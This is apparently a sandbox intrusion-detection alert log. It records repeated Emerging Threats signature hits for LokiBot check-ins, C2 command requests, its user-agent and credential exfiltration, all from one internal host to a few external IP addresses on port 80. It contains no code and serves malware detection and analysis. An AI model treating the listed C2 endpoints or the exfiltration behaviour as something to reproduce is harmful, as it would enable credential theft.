Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:59.521470
SID:	2024313
Source Port:	49241
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:30.098368
SID:	2025381
Source Port:	49214
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:19:11.675767
SID:	2021641
Source Port:	49254
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:17:36.624490
SID:	2021641
Source Port:	49165
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:17.156368
SID:	2021641
Source Port:	49200
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:17:50.058542
SID:	2024313
Source Port:	49177
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:39.381191
SID:	2024318
Source Port:	49219
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:55.233506
SID:	2021641
Source Port:	49236
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:19:13.398917
SID:	2025381
Source Port:	49256
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:17:50.058542
SID:	2024318
Source Port:	49177
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:11.714251
SID:	2024313
Source Port:	49198
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:11.714251
SID:	2024318
Source Port:	49198
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:52.425128
SID:	2025381
Source Port:	49233
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:30.957362
SID:	2025381
Source Port:	49215
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:16.270962
SID:	2825766
Source Port:	49199
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:39.511374
SID:	2025381
Source Port:	49167
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:51.088057
SID:	2825766
Source Port:	49232
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:47.441038
SID:	2024318
Source Port:	49228
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:07.107766
SID:	2024313
Source Port:	49193
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:37.677256
SID:	2025381
Source Port:	49217
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:50.061779
SID:	2021641
Source Port:	49231
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:09.860809
SID:	2024313
Source Port:	49196
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:09.860809
SID:	2024318
Source Port:	49196
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:56.049434
SID:	2024318
Source Port:	49182
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.9

Timestamp:	05/23/24-20:18:40.275029
SID:	2024313
Source Port:	49220
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:18.079750
SID:	2825766
Source Port:	49201
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.9

Timestamp:	05/23/24-20:18:40.275029
SID:	2024318
Source Port:	49220
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:14.278026
SID:	2825766
Source Port:	49257
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:22.772748
SID:	2021641
Source Port:	49206
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:07.107766
SID:	2024318
Source Port:	49193
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:56.049434
SID:	2024313
Source Port:	49182
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:41.981231
SID:	2024318
Source Port:	49222
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:55.233506
SID:	2825766
Source Port:	49236
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:52.694696
SID:	2024313
Source Port:	49180
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:41.981231
SID:	2024313
Source Port:	49222
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:40.814233
SID:	2024318
Source Port:	49168
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:19.988815
SID:	2825766
Source Port:	49203
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:40.814233
SID:	2024313
Source Port:	49168
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:19.988815
SID:	2021641
Source Port:	49203
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:54.073092
SID:	2025381
Source Port:	49181
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:19:16.005968
SID:	2025381
Source Port:	49259
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:31.712532
SID:	2024318
Source Port:	49216
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:31.712532
SID:	2024313
Source Port:	49216
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:10.679781
SID:	2025381
Source Port:	49197
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:01.377448
SID:	2024318
Source Port:	49243
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:08.948107
SID:	2024318
Source Port:	49195
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:01.377448
SID:	2024313
Source Port:	49243
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:26.597772
SID:	2021641
Source Port:	49210
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:19:03.316993
SID:	2021641
Source Port:	49245
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:52.694696
SID:	2024318
Source Port:	49180
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:08.948107
SID:	2024313
Source Port:	49195
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:21.836224
SID:	2024313
Source Port:	49205
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:25.484710
SID:	2825766
Source Port:	49209
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:07.020535
SID:	2025381
Source Port:	49249
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:09.943896
SID:	2025381
Source Port:	49252
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:18.441021
SID:	2825766
Source Port:	49262
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:07.107766
SID:	2025381
Source Port:	49193
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:56.909324
SID:	2021641
Source Port:	49238
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:49.167216
SID:	2021641
Source Port:	49230
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:48.359257
SID:	2021641
Source Port:	49229
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:53.400223
SID:	2825766
Source Port:	49234
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:56.049434
SID:	2025381
Source Port:	49182
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:00.736741
SID:	2025381
Source Port:	49187
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:59.521470
SID:	2021641
Source Port:	49241
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:19:03.316993
SID:	2825766
Source Port:	49245
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:03.278750
SID:	2025381
Source Port:	49190
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.9

Timestamp:	05/23/24-20:17:43.183162
SID:	2025381
Source Port:	49170
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:17:36.624490
SID:	2024312
Source Port:	49165
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:17.156368
SID:	2024318
Source Port:	49200
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:17.156368
SID:	2024313
Source Port:	49200
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:56.093323
SID:	2825766
Source Port:	49237
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:18.976087
SID:	2024318
Source Port:	49202
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:42.120355
SID:	2825766
Source Port:	49169
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:18.976087
SID:	2024313
Source Port:	49202
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:15.184596
SID:	2024313
Source Port:	49258
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:11.714251
SID:	2021641
Source Port:	49198
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:15.184596
SID:	2024318
Source Port:	49258
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:22.772748
SID:	2825766
Source Port:	49206
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:21.836224
SID:	2024318
Source Port:	49205
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:17:36.624490
SID:	2024317
Source Port:	49165
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:44.106859
SID:	2021641
Source Port:	49171
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:39.381191
SID:	2025381
Source Port:	49219
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:04.176231
SID:	2024318
Source Port:	49191
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:09.860809
SID:	2021641
Source Port:	49196
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:01.557933
SID:	2024318
Source Port:	49188
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:18:52.425128
SID:	2021641
Source Port:	49233
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:24.566045
SID:	2025381
Source Port:	49208
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:01.557933
SID:	2024313
Source Port:	49188
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:16.882044
SID:	2025381
Source Port:	49260
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:57.920775
SID:	2825766
Source Port:	49184
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:46.332436
SID:	2021641
Source Port:	49173
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.9

Timestamp:	05/23/24-20:19:05.135747
SID:	2825766
Source Port:	49247
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:04.176231
SID:	2024313
Source Port:	49191
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:45.625277
SID:	2825766
Source Port:	49226
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:02.368807
SID:	2825766
Source Port:	49189
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.9

Timestamp:	05/23/24-20:18:38.560340
SID:	2024318
Source Port:	49218
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:40.814233
SID:	2021641
Source Port:	49168
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:26.597772
SID:	2024318
Source Port:	49210
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.9

Timestamp:	05/23/24-20:18:38.560340
SID:	2024313
Source Port:	49218
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:51.806006
SID:	2025381
Source Port:	49179
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:50.944456
SID:	2021641
Source Port:	49178
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:10.679781
SID:	2825766
Source Port:	49197
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:14.278026
SID:	2025381
Source Port:	49257
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:18:23.674890
SID:	2021641
Source Port:	49207
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:18:26.597772
SID:	2024313
Source Port:	49210
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:01.377448
SID:	2021641
Source Port:	49243
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:17.653379
SID:	2024318
Source Port:	49261
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:19:17.653379
SID:	2024313
Source Port:	49261
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:17:39.511374
SID:	2024313
Source Port:	49167
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN LokiBot Checkin M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.96.3

Timestamp:	05/23/24-20:17:49.147570
SID:	2825766
Source Port:	49176
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.96.9

Timestamp:	05/23/24-20:19:02.183841
SID:	2021641
Source Port:	49244
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:19:13.398917
SID:	2024318
Source Port:	49256
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:19:16.005968
SID:	2021641
Source Port:	49259
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.22 - Destination IP: 188.114.97.3

Timestamp:	05/23/24-20:19:10.741295
SID:	2021641
Source Port:	49253
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.22 - Destination IP: 188.114.97.9

Timestamp:	05/23/24-20:18:40.275029
SID:	2025381
Source Port:	49220
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

